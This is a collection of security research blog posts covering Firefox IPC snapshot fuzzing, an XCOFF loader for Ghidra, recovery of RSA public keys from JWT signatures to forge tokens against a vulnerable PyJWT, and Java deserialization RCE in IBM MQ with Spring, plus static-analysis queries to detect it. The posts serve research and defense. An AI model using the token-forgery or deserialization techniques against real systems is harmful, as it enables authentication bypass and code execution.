Fuzzy Snapshots of Firefox IPC

Author: b

In January Mozilla published a post on their Attack & Defense blog about Effectively Fuzzing the IPC Layer in Firefox. In this post the authors pointed out that testing individual components of complex systems (such as a web browser) in isolation should be extended by full-system testing, for which snapshot fuzzing seems like a promising tool. As I’ve been using KF/x – a snapshot fuzzer based on Xen’s virtual machine introspection capabilities – since its first release, this seemed like a perfect challenge to create a realistic demo for the fuzzer and put Mozilla’s suggestions (not to mention my skills) to the test.

This blog post is aimed to show how a complex, real-life target can be harnessed with KF/x, and to highlight some challenges in the snapshot fuzzing space.

But before we dive into these topics, I’d like to highlight the fact that I have zero experience with Firefox, while the majority of this experiment was done in a couple of day’s time. I will approach this experiment as if Firefox was a black-box target from instrumentation standpoint, but I’ll often cut corners by reffering to source code instead of reversing the binary.

I also like to say that sharing one’s failures can provide valuable lessons for others – this is one of the cases when I don’t spare on learning material, so buckle up!

Snapshot Fuzzing with KF/x

KF/x is first and foremost a harnessing tool: it allows capturing a snapshot of a Xen domain (VM), inject a test case into its memory, capture code-coverage information and sink (crash) events up to some predefined point, then revert the state. Collected data is then communicated to the outside world by implementing an AFL-compatible shared memory interface. KF/x can be treated as the fuzzer’s target program, while during each test case a virtual machine is executed and inspected for coverage data. While the primary goal of KF/x was targeting kernels, it is capable of harnessing user-land processes in Linux and Windows as well. The primary use-case of KF/x for me is to target black-box targets with anti-debug functionality on Windows.

As you see, KF/x relies on virtualization to execute whole systems. VM snapshots are based on CoW memory that makes restoring snapshots really fast, while the target can run at close to native speed. While this property is admittedly attractive, we will see that virtualization based instrumentation has some challenges that are easier to solve with emulation based solutions. A great blog post about setting up one of those latter type of fuzzers can be read here (thx for the tip @banyaszvonat!).

You can find more information (including presentations by its author, @tklengyel) about KF/x on it’s GitHub page.

Invalidating Assumptions

Mozilla’s post provides the reader with tempting information about how to start out with fuzzing the IPC layer:

  • Public bugs affecting the IPC interface – Investigating N-days is always a good way to get familiar with a target
  • Possible snapshot points in the browser’s code flow – Knowing when important things happen is crucial for snapshot fuzzing, esp. when we work with VMs, where (contrary to emulators) the target executes on actual hardware, independently from our introspection code.

I quickly filtered the listed bugs to “The Icon Bug”, which is an OOB read, so

  • … it will likely end up in invalid memory access (not a “logic bug”, which would require custom sink definitions for detection)
  • … it has a better chance than a UaF to be detected without additional memory access instrumentation (such as ASAN) – contrary to emulator based solutions, we don’t get to inspect memory accesses of the virtualized target by default

I set a up a Debian 10 VM, and downloaded Firefox 61a1 from April 2018, close to the bug report. I also cloned the source code of this version and tried to compile it, but it seemed like the bootstrap infrastructure have moved away from behind this old code. Fortunately the binaries were not stripped, which helped a lot.

The first thing we need to make KF/x work is to create a snapshot of the virtual machine at a point in time, where our controlled input is already loaded in memory, but just before its parsing started. We will mark this state with a breakpoint, and use VM instrumentation to manipulate the input buffer directly in the VM’s memory, then let the system play with it.

While Mozilla made multiple suggestions about the optimal snapshot place, (based on my admittedly sloppy understanding of the corresponding code) I believe the mentioned methods are unfortunately too far from this optimal point, as references to the input data are not directly present. I looked at the crash report instead, where the first call outside the fuzzing harness (Mozilla’s, not KF/x) is PContentParent::OnMessageReceived(IPC::Message const&). This looked like a promising method: one that is called every time a new IPC message arrives. Inspecting the code also confirmed that this is indeed a large dispatcher routine that makes indirect calls to message receiver implementations based on a 4-byte identifier in the form of 0x002d00xx.

The bug report also included a minimized test case, which looks like this:

00000000  28 00 00 00 ff ff ff 7f  97 00 2d 00 45 6e 76 50  |(.........-.EnvP| 
00000010 6c 69 67 6e 75 7b 6c 75 67 6e 73 00 00 00 00 00 |lignu{lugns.....|
00000020 04 00 00 00 01 00 00 00 9b 9a 9a ba 73 00 00 00 |............s...|
00000030 00 78 69 74 63 6f 64 65 65 72 5f 73 6d 78 69 74 |.xitcodeer_smxit|
00000040 63 00 00 72 5f 73 6d 61 |c..r_sma|
00000048

Here we can immediately see the 0x002d0097 message type identifier (in assembly we trust: in source we’d “only” see Msg_SetURITitle) , INT_MAX, and also a likely length value as the first DWORD of the stream. This must be some kind of serialization.

The problem at this point was that the OnMessageReceived method got an IPC::Message object from its caller, while I had a file with some bytes in it. How do I inject this serialized stream into the process, so it will be parsed as expected?

A quick look at the decompiled code revealed that the message type ID is read from an address relative to a register value, and when I checked this address in a debugger, I indeed got something that closely resembled the previous stream structure:

Retrieving message type ID
Memory dump at RAX

This was enough for me to do the whole harnessing dance, with carefully placing breakpoints in Firefox, noting relevant addresses. Even when I tested the harness with bare KF/x (running without AFL), the minimized test case crashed the process (inside the VM snapshot), while the one I drag out of /dev/urandom did not – this wasn’t a sound proof though that everything was working as expected.

I started suspecting that something is wrong, when I couldn’t find the “offending” bytes in the crashing sample, so that I could make it survive parsing. Then I launched AFL with my slightly modified samples, and noticed that it recorded crashes even when the message type ID was corrupted, so the affected parser could never get invoked.

I assumed that the buffer I was manipulating wasn’t the (only) region of memory that affected the state of the IPC::Message object. In fact, when searching the memory of the process at our supposed snapshot point, we can find dozens of patterns in memory that look like the same serialized message.

In case of my other targets one thing that usually works in similar scenarios is to try and inject modified input to all possible buffers with KF/x, and see in which case(s) the execution path changes. In this case, however, I looked for a different, less brute-force approach, largely because the source code of IPC::Message and its parent classes presented a labyrinth of data structures that wouldn’t necessarily contain the serialized input in a single continuous block of memory.

Learning from prior art

How did Mozilla’s fuzzer feed that byte stream to Firefox, so the bug could be found in the first place? Again, the published crash log quickly reveals that the magic is happening in the ProtocolFuzzer::FuzzProtocol method – the relevant parts are the following:

void FuzzProtocol(T* aProtocol, const uint8_t* aData, size_t aSize,
const nsTArray& aIgnoredMessageTypes) {
while (true) {
uint32_t msg_size =
IPC::Message::MessageSize(reinterpret_cast(aData),
reinterpret_cast(aData) + aSize);
if (msg_size == 0 || msg_size > aSize) {
break;
}
IPC::Message m(reinterpret_cast(aData), msg_size);
// ...

  if (m.is_sync()) {
  UniquePtr<IPC::Message> reply;
  aProtocol->OnMessageReceived(m, *getter_Transfers(reply));
  } else { aProtocol->OnMessageReceived(m); }

The important part is that IPC::Message has a constructor that accepts a raw byte stream. Later, the resulting object is passed to OnMessageReceived() (of PContentParenṫ, with some C++ magic), so we were on the right path here.

Interestingly, neither could I find a reference to this magical constructor in the decompiled libxul library, nor with GDB. In source, the “missing” constructor was present of course:

Message::Message(const char* data, int data_len)   : Pickle(MSG_HEADER_SZ_DATA, data, data_len) {
MOZ_COUNT_CTOR(IPC::Message);
}

The Pickle reference is part of an initialization list: when an IPC::Message is initialized with a raw buffer in source code, it’s actually the Pickle constructor that’s being called. When breaking on this constructor, we can see that it is invoked by IPC::Channel::ChannelImpl::ProcessIncomingMessages(). Since this method processes messages all the time, it’s worth to set a conditional breakpoint so we’ll only see Msg_SetURITitle (aka. 0x2d0097) messages:

We can confirm this is working by loading any website, so the tab title will change, and the breakpoint will hit.

Interestingly, when I replaced 0x2d0097 message with the published trigger, ProcessIncomingMessages() discarded it, stating that it’d require too many file descriptors, so the bug didn’t trigger. Even when I patched out the check with GDB, an assertation-like method (MOZ_CrashPrintf()) triggered the SEGFAULT, instead of the one mentioned in the original report. With my limited FF knowledge I can’t tell if Mozilla’s fuzzer digs into a “private” interface when calling OnMessageReceived() directly, or there are legitimate ways to do this when running in a sandboxed process.

Anyway, this is enough to harness this beast (well, kind of, we’re far from the end…), and it would be interesting to find out whether some bug could be reached with the above check in place!

Just Harness Already!

OK, so the plan is this:

  • Set a conditional breakpoint on the Pickle constructor that only triggers when a message with type Msg_SetURITitle is received. We know that this constructor already performs some interesting parsing.
  • Put an INT3 (0xCC) breakpoint on an upcoming instruction – this will signal KF/x that it should take a snapshot of the VM. Note the first byte of the instruction, as KF/x will have to restore this value, just as a debugger in the guest would. After this breakpoint is hit, any other breakpoint will trigger the restoration of the snapshot state from dom0.
  • Limit execution of the process: my usual approach is to look at the stack trace, and place a breakpoint on some previous return address. This way all of the potential returns of the functions higher in the stack will be covered.

When this is all set up in the guest, we have to start KF/x in setup mode, so it’ll start listen for the first breakpoint interrupt. When we continue execution in the guest the first INT3 triggers the snapshot capture (and the restoration of the original instruction byte).

After this we can start playing with KF/x: when executed outside the fuzzer it just runs until the first breakpoint, displays the crash/no crash verdict, and optionally the recorded instruction trace (–debug). While doing these test runs, I noticed that if the file descriptor check fails, the VM enters an infinite loop. This is because the VM’s device model is removed from the snapshot, so when Firefox attempts to write some warnings to logs the target device is no longer there. This could be solved easily by looking up code addresses noted during harnessing, and using the rwmem utility that comes with KF/x to simply put another breakpoint inside the body of that nasty if(we don't have enough descriptors){} statement, so the harness will treat it as a “stop” event for the fuzz iteration.

The process is shown on the following video:

We can see that we are fuzzing something, and that AFL finds crashes almost immediately. Unfortunately, these are also different assertions, showing that there are several checks in addition to the one for the number of file descriptors before OnMessageReceived() that our serialized message has to survive. By adding new breakpoints to the relevant assertion methods, these results can be filtered (also with putting breakpoints with rwmem), and even performance will grow.

Now that performance is mentioned: When I started these experiments, my VM config and KF/x version were not in sync, so I couldn’t use Intel PT for coverage tracing. Without HW support, KF/x places breakpoints on-the-fly into the target, triggering a context switch at each basic block. This approach is very slow, yielding less than 10 c/s in AFL. After upgrading my system, I could achieve ~3000 c/s with Intel PT, with peaks over 4000. This is not a benchmarking post though.

The new assertions we’re hitting here are mostly related to so called “sentinels”: constant DWORD identifiers in the serialized messages. Fuzzing builds of Firefox disable sentinel checks, so the published trigger was riddled with invalid values that I fixed manually in the serialized file. “Magic” values like these will render an uniformed input generator useless of course, but this is not relevant to our current experiment.

With this “valid” serialized message, I could reach a state where the parser would want to read past the end of the buffer. Pickle objects maintain a pointer to the end of their buffer and one for the current read position. The following screenshot shows that these two pointers are equal, while execution reaches ipc::ReadIPDLParam() that would read past the end pointer:

Almost overread

This is not a bug, as the Read…methods of PickleIterator check if they’d read past the end pointer stored in the object, but shows that something is fishy with the object that could cause trouble in later phases of parsing – given that execution can reach that point of course…

It’s also worth noting that this deserialization from the raw buffer to a Pickle happens in a different thread from where we’ve set our original buffer. Multi-threading can make it difficult to match test inputs with observed behaviors, and in case of KF/x we can only hope that no device access happens (remember: we don’t have devices during fuzzing) until the thread scheduler prioritizes the Message parser thread within the same process.

Back-of-a-napkin view of message reception

So in summary, while inspecting the original fuzzer helped to identify a part of code where serialized data can be fed to the system, saving a snapshot here is not a good enough to reach the message parsing logic affected by our test bug. It is also pretty clear that the trigger published in the original bug report will not be useful in a standard build because numerous assertions are in the way.

Back to the other side

My little detour on the other side of the message handler wasn’t in vain: I learned a lot about the structure of the Pickles, the Message objects created from them, and the mechanics of message passing between the different threads of the target process. The initial heaps of false positives resulting from the original trigger also made sense now, having dealt with the sentinels and other IPDL format checks.

Based on this, I could handcraft a Pickle object for ProcessIncomingMessages() and catch it when it arrived at OnMessageReceived(). It turned out that the buffer I identified on my first try was in fact the one processed by OnMessageReceived() with a PickleIterator.

The process of harnessing the side of the message parser thread is shown in the following demo:

While the process is basically the same as it was for the message receiver thread, there are a couple of things to notice.

First, a breakpoint is placed to MOZ_Crash_Printf(), which is usually called called when different assertions are hit. The breakpoint here triggers a revert without touching a sink, improving signal/noise ratio.

Second, the execution of libc’s __tls_get_addr() is inspected briefly, for no apparent reason. This is the result of a message from the Demo Gods: when I was recording a previous version of this video, I had an almost perfect shot, where executing the target even with unmodified data crashed. After much frustration I ended up injecting some hand crafted buffers to the target, and confirmed that all calls to this library function crash. A likely explanation for this (taking into account that this problem is not deterministic), is that the memory page holding the library code was paged out when the snapshot was taken, so the page fault handler – hooked by KF/x as a crash sink – got called. A nice summary of this problem and some possible solutions are available here from the HVMI project.

As you can see, manipulating the originally identified buffer when executing OnMessageReceived() results in numerous different execution paths, and even some crashes – which are, again, other assertions. At this point I decided to give this project a break, and write up my experiences, as I felt there’s already much to think about.

Conclusions

So what can one make out of all this? Here are some of my thoughts:

  • User input is generally delivered to programs as some kind of serialized stream of bytes (file, network packet, etc.), which is easiest to target with the presented approach. However, interesting functionality may only be reachable via complex in-memory objects – harnessing in such cases may require target-specific tweaking.
  • Working with VMI is pretty easy, but figuring out the runtime memory layout of complex objects isn’t. Snapshot fuzzers can be supported by test API’s that accept simple(r) types, and invoke constructors and deserializers internally.
  • Copies of user input are often stored at multiple places in memory. It is important to determine early if we target the right address by executing well thought-out test cases and inspecting if our input affects the code flow at all. In many cases, the simplest solutions work best.
  • Collecting events from the target VM is a crucial part of virtualization-based snapshot fuzzing. In case of coverage tracking, performance cost of context switching can easily skyrocket. The usual solutions to this are HW assistance (e.g. Intel PT, BTS) or coarser tracking (e.g. periodic sampling; not tracking “boring” paths).
  • Test paths may differ from the ones reachable during real execution. This can beneficial for defense-in-depth, but not necessarily for finding exploitable vulnerabilities.
  • Bug “enrichment” (like ASAN) for virtualization based snapshot fuzzers looks like an important area to research further.
  • The lack of device model introduces some challenges. For example, when reading large files, the entirety of the file may not be present in the memory at once, and fuzzing needs to be split into separate phases. On the other hand, this lack of state guarantees that the fuzzer always returns to the same state and doesn’t leak memory :)

I’m pretty sure, these experiments could be improved, so if you have some ideas (or think I made another mistake somewhere), please reach out!

Finally, I’d like to thank Christoph Kerschbaumer and Christian Holler for their inspiring blog post – I wish we could see more of its kind! I’d also like to thank Tamás K. Lengyel once again for his amazing work on bringing snapshot fuzzing to the masses with KF/x!

Featured image from Prodigy’s official Smack My Bitch Up music video – which is apparently too much for the Brave New Web of 2021.


Adding XCOFF Support to Ghidra with Kaitai Struct

Author: b

It’s not a secret that we at Silent Signal are hopeless romantics, especially when it comes to classic Unix systems (1, 2, 3). Since some of these systems – that still run business critical applications at our clients – are based on some “exotic” architectures, we have a nice hardware collection in our lab, so we can experiment on bare metal.

We are also spending quite some time with the Ghidra reverse engineering framework that has built-in support for some of the architectures we are interested in, so the Easter holidays seemed like a good time to bring the two worlds together.

My test target was an RS/6000 system running IBM AIX. The CPU is a 32-bit, big-endian PowerPC, that is already (mostly?) supported by Ghidra, but to my disappointment, the file format was not recognized when importing one of the default utilities of AIX to the framework. The executable format used by AIX is XCOFF, and as it turned out, Ghidra only has a partial implementation for it.

At this point I had multiple choices: I could start to work on the existing XCOFF code, or could try to hack the fully functional COFF loader just enough to make it accept XCOFF too, but none of these options made my heart beat faster:

  • Java doesn’t have unsigned primitives, that makes parsing of byte streams painful
  • The existing ~1000 LoC XCOFF implementation includes a wide set of structure definitions with basic getters and setters, but it doesn’t handle more complex schematics of the input
  • The COFF loader expects everything to be little-endian – adding support for BE would require rewriting everything

Instead, I decided to start from scratch, and develop code, that:

  • is reusable in tools other than Ghidra
  • is easy to read, write and extend
  • has excellent debug tools

Ghidra ❤️ Kaitai

The above benefits are provided by Kaitai Struct, “a declarative binary format parsing language”. Instead of implementing a parser in a particular (procedural) language and framework, with Kaitai we can describe the binary format in a YAML-like structure (I know, YAML===bad, but believe me, this stuff works), and then let the Kaitai compiler produce parser code in different languages for us from the same declaration.

Although my Kaitai-fu (picked up mainly through these challenges at Avatao) was rusty , I managed to put together a partial, hacky, but working format declaration in a couple of hours for XCOFF32, based on IBM’s documentation.

This approach also had some benefits from research standpoint, as by reading the specification I could spot

  • inconsistencies between specification and implementation
  • redundant information (e.g. size specifications) in the spec

both of which can lead to interesting parsing bugs! (After this, I wasn’t surprised, when while digging Google I found that IDA, which has built-in XCOFF support has suffered from such bugs in the past)

Coming back to Ghidra development, I could create two implementations from the same Kaitai structure: one in Python, one in Java. I could import the Java implementation as a class in my Ghidra Loader and debug Ghidra-specific code in Eclipse, while check the semantic correctness of the parser and explore the API more comfortably in Python REPL:

$ python -i test.py portmir
.text 0x20
.data 0x40
.bss 0x80
.loader 0x1000
>>> hex(portmir.section_headers[0].s_vaddr)
'0x10000100'

… or just browse the parsed structures in KT‘s awesome WebIDE.

Integrating the generated Java code with Ghidra was a piece of cake:

  • Add Kaitai’s runtime library to the project
  • Wrap the Java byte array provided by Ghidra’s ByteProvider with ByteBufferKaitaiStream, and use the appropriate constructor of the generated class

After the Ghidra-Kaitai interface was set, the only things left were setting the default big-endian PowerPC language, letting Kaitai parse the section headers of the XCOFF file, and mapping them to the Program memory. After this, I could immediately see convincing disassembly and decompilation(!) results:

First disassembly and decompilation result

(Mysterious) Symbols of Love

To give Ghidra more hints about the program structure, I proceeded by parsing symbol information. I don’t want to dive deep into the XCOFF format in this post, but in short, there is a symbol table defined by the .loader section of the binary, that holds information about imports and exports, and there is an optional symbol table potentially referenced by the main header for more detailed information. XCOFF can also contain a TOC (table of contents) that contains valuable structural information for reverse engineering if present.

Since the small utility I used for testing only contained a loader symbol table, I implemented parsing for that, and managed to find the entry function of the file, which was not identified during automatic analysis.

To check my results, I also loaded the sample file into IDA, and to my surprise, this tool showed much more symbols than the loader symbol table! I searched for some of the missing symbols in the binary and found a single occurrence of every missing function name inside the .text section:

Length-prefixed string structure inside the .text section

After a lot of digging (and asking on Twitter) I found that this arrangement matches the Symbol Table Layout described in the specification:

Source: https://www.ibm.com/docs/en/aix/7.2?topic=formats-xcoff-object-file-format

So far, I couldn’t fully decipher this layout, but my working theory is that while the optional symbol table and TOC were removed by stripping, the per-function stabs remained untouched. If so, this is good news for reverse engineers interested in the XCOFF format :)

Update 2021.04.07: As /u/ohmantics pointed out, this is actually the Traceback Table of the function.  Proper support for these structures coming soon!

While the parser of this information should be placed in a proper analyzer module, for now, I put together a simple Python script that tries to parse string structures from between declared functions, and renames functions accordingly:

Pseudocode with additional symbol names

Summary

This blog post showed that Kaitai Struct can be an effective tool to add new formats to Ghidra. Parser development is a tedious and error-prone process that should be outsourced to machines, which don’t get frustrated at the 92nd bitfield definition, and can produce the same, correct implementation for every instance (provided you don’t screw up the parser declaration itself ;) ).

The post allowed a peek inside the XCOFF format too, that seems to worth some security-minded study in parser applications.

We hope that our published code will attract contributors that are also interested in bringing XCOFF to Ghidra or even to other research tools:

Featured image is from Wikipedia (our boxes look much cooler)


Abusing JWT public keys without the public key

Author: b

This blog post is dedicated to those to brave souls that dare to roll their own crypto 

The RSA Textbook of Horrors

This story begins with an old project of ours, where we were tasked to verify (among other things) how a business application handles digital signatures of transactions, to comply with four-eyes principles and other security rules.

The application used RSA signatures, and after a bit of head scratching about why our breakpoints on the usual OpenSSL API’s don’t trigger, but those placed at the depths of the library do, we realized that developers implemented what people in security like to call “Textbook RSA” in its truest sense. This of course led to red markings in the report and massive delays in development, but also presented us with some unusual problems to solve.

One of these problems stemmed from the fact that although we could present multiple theoretical attacks on the scheme, the public keys used in this application weren’t published anywhere, and without that we had no starting point for a practical attack.

At this point it’s important to remember that although public key cryptosystems guarantee that the private key can’t be derived from the public key, signatures, ciphertexts, etc., there are usually no such guarantees for the public key! In fact, the good people at the Cryptography Stack Exchange presented a really simple solution: just find the greatest common divisor (GCD) of the difference of all available message-signature pairs. Without going into the details of why this works (a more complete explanation is here), there are a few things that worth noting:

  • An RSA public key is an (n,e) pair of integers, where n is the modulus and e is the public exponent. Since e is usually some hardcoded small number, we are only interested in finding n.
  • Although RSA involves large numbers, really efficient algorithms exist to find the GCD of numbers since the ancient times (we don’t have to do brute-force factoring).
  • Although the presented method is probabilistic, in practice we can usually just try all possible answers. Additionally, our chances grow with the number of known message-signature pairs.

In our case, we could always recover public keys with just two signatures. At this time we had a quick and dirty implementation based on the gmpy2 library that allowed us to work with large integers and modern, efficient algorithms from Python.

JOSE’s curse

It took a couple of weeks of management meetings and some sleep deprivation to strike me: the dirty little code we wrote for that custom RSA application can be useful against a more widespread technology: JSON Web Signatures, and JSON Web Tokens in particular.

Design problems of the above standards are well-known in security circles (unfortunately these concerns can’t seem to find their ways to users), and alg=”none” fiascos regularly deliver facepalms. Now we are targeting a trickier weakness of user-defined authentication schemes: confusing symmetric and asymmetric keys.

If you are a developer considering/using JWT (or anything JOSE), please take the time to at least read this post! Here are some alternatives too.

In theory, when a JWT is signed using an RSA private key, an attacker may change the signature algorithm to HMAC-SHA256. During verification the JWT implementation sees this algorithm, but uses the configured RSA public key for verification. The problem is the symmetric verification process assumes that the same public key was used to generate the MAC, so if the attacker has the RSA public key, she can forge the signature too.

In practice however, the public key is rarely available (at least in a black-box setting). But as we saw earlier, we may be able to solve this problem with some algebra. The question is: are there any practical factors that would prevent such an exploit?

 CVE-2017-11424

To demonstrate the viability of this method we targeted a vulnerability of PyJWT version 1.5.0 that allowed key confusion attacks as described in the previous section. The library uses a blacklist to avoid key parameters that “look like” asymmetric keys in symmetric methods, but in the affected version it missed the “BEGIN RSA PUBLIC KEY” header, allowing PEM encoded public keys in the PKCS #1 format to be abused. (I haven’t checked how robust key filtering is, deprecating the verification API without algorithm specification is certainly the way to go)

Based on the documentation, RSA keys are provided to the encode/decode API’s (that also do signing and verification) as PEM encoded byte arrays. For our exploit to work, we need to create a perfect copy of this array, based on message and signature pairs. Let’s start with the factors that influence the signature value:

  • Byte ordering: The byte ordering of JKS’s integer representations matches gmpy2‘s.
  • Message canonization: According to the JWT standard, RSA signatures are calculated on the SHA-256 hash of the Base64URL encoded parts of tokens, no canonization of delimiters, whitespaces or special characters is necessary.
  • Message padding: JKS prescribes deterministic PKCS #1 v1.5 padding. Using the appropriate low level crypto API’s (this took me a while, until I found this CTF writeup) will provide us with standards compliant output, without having to mess with ASN.1.

No problem here: with some modifications of our original code, we could successfully recreate the Base64URL encoded signature representations of JWT tokens. Let’s take a look at the container format (this guide is a great help):

  • Field ordering: Theoretically we could provide e and n in arbitrary order. Fortunately PKCS #1 defines a strict ordering of parameters in the ASN.1 structure.
  • Serialization: DER (and thus PEM) encoding of ASN.1 structures is deterministic.
  • Additional data: PKCS #1 doesn’t define additional (optional) data members for public keys.
  • Layout: While it is technically possible to parse PEM data without standard line breaks, files are usually generated with lines wrapped at 64 characters.

As we can see, PKCS #1 and PEM allows little room for changes, so there is a high chance that if we generate a standards compliant PEM file it will match the one at the target. In case of other input formats, such as JWK, flexibility can result in a high number of possible encodings of the same key that can block exploitation.

After a lot of cursing because of the bugs and insufficient documentation of pyasn1 and asn1 packages, asn1tools finally proved to be usable to create custom DER (and thus PEM) structures. The generated output matched perfectly with the original public key, so I could successfully demonstrate token forgery without preliminary information about the asymmetric keys:

We tested with the 2048-bit keys from the JKS standard: it took less than a minute on a laptop to run the GCD algorithm on two signatures, and the algorithm produced two candidate keys for PKCS #1 which could be easily tested.

As usual, all code is available on GitHub. If you need help to integrate this technique to your Super Duper JWT Haxor Tool, use the Issue tracker!

Applicability

The main lesson is: one should not rely on the secrecy of public keys, as these parameters are not protected by mathematical trapdoors.

This exercise also showed the engineering side of offensive security, where theory and practice can be far apart: although the main math trick here may seem unintuitive, it’s actually pretty easy to understand and implement. What makes exploitation hard, is to figure out all those implementation details that make pen and paper formulas work on actual computers. It won’t be a huge surprise to anyone who worked with digital certificates and keys that at least 2/3 of the work involved here was about reading standards, making ASN.1 work, etc. (Not to mention constantly converting byte arrays and strings in Python3 :P) Interestingly, it seems that the stiffness of these standards makes the format of the desired keys more predictable, and exploitation more reliable!

On the other hand, introducing unpredictable elements in the public key representations can definitely break the process. But no one would base security on their favorite indentation style, would they?


Unexpected Deserialization pt.1 – JMS

Author: b

On a recent engagement our task was to assess the security of a service built on IBM Integration Bus, an integration platform for Java Messaging Services. These scary looking enterprise buzzwords usually hide systems of different complexities connected with Message Queues. Since getting arbitrary test data in and out of these systems is usually non-trivial (more on this in the last paragraph), we opted for a white-box analysis, that allowed us to discover interesting cases of Java deserialization vulnerabilities.

First things first, some preliminary reading:

  • If you are not familiar with message queues, read this tutorial on ZeroMQ, and you’ll realize that MQ’s are not magic, but they are magical :)
  • Matthias Kaiser’s JMS research provided the basis for this post, you should read it before moving on

Our target received JMS messages using the Spring Framework. Transport of messages was done over IBM MQ (formerly IBM Websphere MQ), this communication layer and the JMS API implementation were both provided by IBM’s official MQ Client for Java.

Matthias provides the following vulnerable scenarios regarding Websphere MQ:

Source

We used everyone’s favorite advanced source code analysis tool – grep – to find references to the getObject() and getObjectInternal() methods, but found no results in the source code. Then we compiled the code and set up a test environment using the message broker Docker image IBM provides (this spared a lot of time), and among some dynamic tests, we ran JMET against it. To our surprise we popped a calculator in our test environment!

Now this was great, but to provide meaningful resolutions to the client, we needed to investigate the root cause of the issue. The application was really simple: it received a JMS message, created an XML document from its contents, and done some other basic operations on the resulting Document objects. We recompiled the source with all the parsing logic removed to see if this is a framework issue – fortunately it wasn’t, the bug didn’t trigger. This narrowed down the code to just a few lines, since the original JMS message was essentially discarded after the XML document was constructed.

The vulnerability was in the code responsible for retrieving the raw contents of the JMS message. Although JMS provides strongly typed messages, and the expected payload were strings, the developers used the getBody() method of the generic JMSMessage class to get the message body as a byte array. One could think (I sure did) that such a method would simply take a slice of the message byte stream, and pass it back to the user, but there is a hint of something weirder in the method signature:

 <T> T    getBody(java.lang.Class<T> c);

The method can return objects of arbitrary class?! After decompiling the relevant classes, all became clear: the method first checks if the class parameter is compatible with the JMS message type, and if it is, it casts the object in the body and returns it. If the JMS message is an Object message, it deserializes its contents, twice: first for the compatibility check, then to create the return object.

I don’t think this is something an average developer should think about, even if she knows about the dangers of deserialization. But this is not the only unintuitive thing that I encountered while falling down this rabbit hole.

Spring’s MessageConverter

At this point I have to emphasize, that our original target wasn’t exactly built according to best practices: JMSMessage is specific to IBM’s implementation, so using it directly chains the application to the messaging platform, which is probably undesirable. To hide the specifics of the transport, the more abstract Message class is provided by the JMS API, but there are even more elegant ways to handle incoming messages.

When using Spring one can rely on the built-in MessageConverter classes that can automatically convert Messages to more meaningful types. So – as demonstrated in the sample app – this code:

receiveMessage(Message m){ /* Do something with m, whatever that is */ }

can become this:

receiveMessage(Email e){ /* Do something with an E-mail */ } 

Of course, using this functionality to automatically convert messages to random Serializable objects is a call for trouble, but Spring’s SimpleMessageConverter implementation can also handle simple types like byte arrays.

To see if converters guard against insecure deserialization I created multiple branches of IBM’s sample application, with different signatures for receiveMessage(). To my surprise, RCE could be achieved in almost all of the variants, even if receiveMessage()’s argument is converted to a simple String or byte[]! IBM’s original sample is vulnerable to code execution too (when the class path contains appropriate gadgets).

After inspecting the code a bit more it seems, that listener implementations can’t expect received messages to be of a certain, safe type (such as TextMessage, when the application works with Strings), so they do their best to transform the incoming messages to a type expected by the developer. Additionally, in case when an attacker sends Object messages, it is up to the transport implementation to define the serialization format and other rules. To confirm this, I ran some tests using ActiveMQ for transport, and the issue couldn’t be reproduced – the reason is clear from the exception:

Caused by: javax.jms.JMSException: Failed to build body from content. Serializable class not available to broker. Reason: java.lang.ClassNotFoundException: Forbidden class org.apache.commons.collections4.comparators.TransformingComparator!
This class is not trusted to be serialized as ObjectMessage payload. Please take a look at http://activemq.apache.org/objectmessage.html for more information on how to configure trusted classes.
at org.apache.activemq.util.JMSExceptionSupport.create(JMSExceptionSupport.java:36) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.apache.activemq.command.ActiveMQObjectMessage.getObject(ActiveMQObjectMessage.java:213) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.springframework.jms.support.converter.SimpleMessageConverter.extractSerializableFromMessage(SimpleMessageConverter.java:219) ~[spring-jms-5.1.7.RELEASE.jar!/:5.1.7.RELEASE]

As we can see, ActiveMQ explicitly prevents the deserialization of objects of known dangerous classes (commons-collections4 in the above example), and Spring expects such safeguards to be the responsibility of the JMS implementations – too bad IBM MQ doesn’t have that, resulting in a deadly combination of technologies.

In Tim Burton’s classic Batman, Joker poisoned Gotham City’s hygene products, so that in certain combinations they produce the deadly Smylex nerve toxin. Image credit: horror.land

Update 2020.09.04.: I contacted Pivotal (Spring’s owner) about the issue, and they confirmed, that they “expect messaging channels to be trusted at application level”. They also agree, that handling ObjectMessages is a difficult problem, that should be avoided when possible: their recommendation is to implement custom MessageConverters that only accepts JMS message types, that can be safely handled (such as TextMessage or BytesMessage).

Conclusions and Countermeasures

In Spring, not relying on the default MessageConverters, and expecting simple Message (or JMSMessage in case of IBM MQ) objects in the JmsListener prevents the problem, independently from the transport implementation. Simple getters, such as getText() can be safely used after casting. The use of even the simplest converted types, such as TextMessage with IBM MQ is insecure! Common converters, such as the JSON based MappingJackson2MessageConverter need further research, as well as other transports, that decided not to implement countermeasures:

Patches resulted from Matthias’s research

Static Analysis

After identifying vulnerable scenarios I wanted to create automated tests to discover similar issues in the future. When aiming for insecure uses of IBM MQ with Spring, the static detection method is pretty straightforward:

  • Identify the parameters of methods annoted with JmsListener
  • Find cases where generic objects are retrieved from these variables via the known vulnerable methods.

In CodeQL a simple predicate can be used to find appropriately annotated sources:

class ReceiveMessageMethod extends Method {
ReceiveMessageMethod() {
this.getAnAnnotation().toString().matches("JmsListener")
}
}

ShiftLeft Ocular also exposes annotations, providing a simple way to retrieve sources:

val sources=cpg.annotation.name("JmsListener").method.parameter

Identifying uses of potentially dangerous API’s is also reasonably simple both in CodeQL:

predicate isJMSGetBody(Expr arg) {
exists(MethodAccess call, Method getbody |
call.getMethod() = getbody and
getbody.hasName("getBody") and
getbody.getDeclaringType().getAnAncestor().hasQualifiedName("javax.jms", "Message") and
arg = call.getQualifier()
)
}

… and in Ocular:

val sinks=cpg.typ.fullName("com.ibm.jms.JMSMessage").method.name("getBody").callIn.argument

Other sinks (like getObject()) can be added in both languages using simple boolean logic. An example run of Ocular can be seen on the following screenshot:

With Ocular, we can also get an exhaustive list of API’s that call ObjectInputStream.readObject() for the transport implementation in use, based on the available byte-code, without having to recompile the library:

ocular> val sinks = cpg.method.name("readObject")
sinks: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@22be2e19
ocular> val sources=cpg.typ.fullName("javax.jms.Message").derivedType.method
sources: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@4da2c297
ocular> sinks.calledBy(sources).newCallChain.l

This gives us the following entry points in IBM MQ:

  • com.ibm.msg.client.jms.internal.JmsMessageImpl.getBody – Already identified
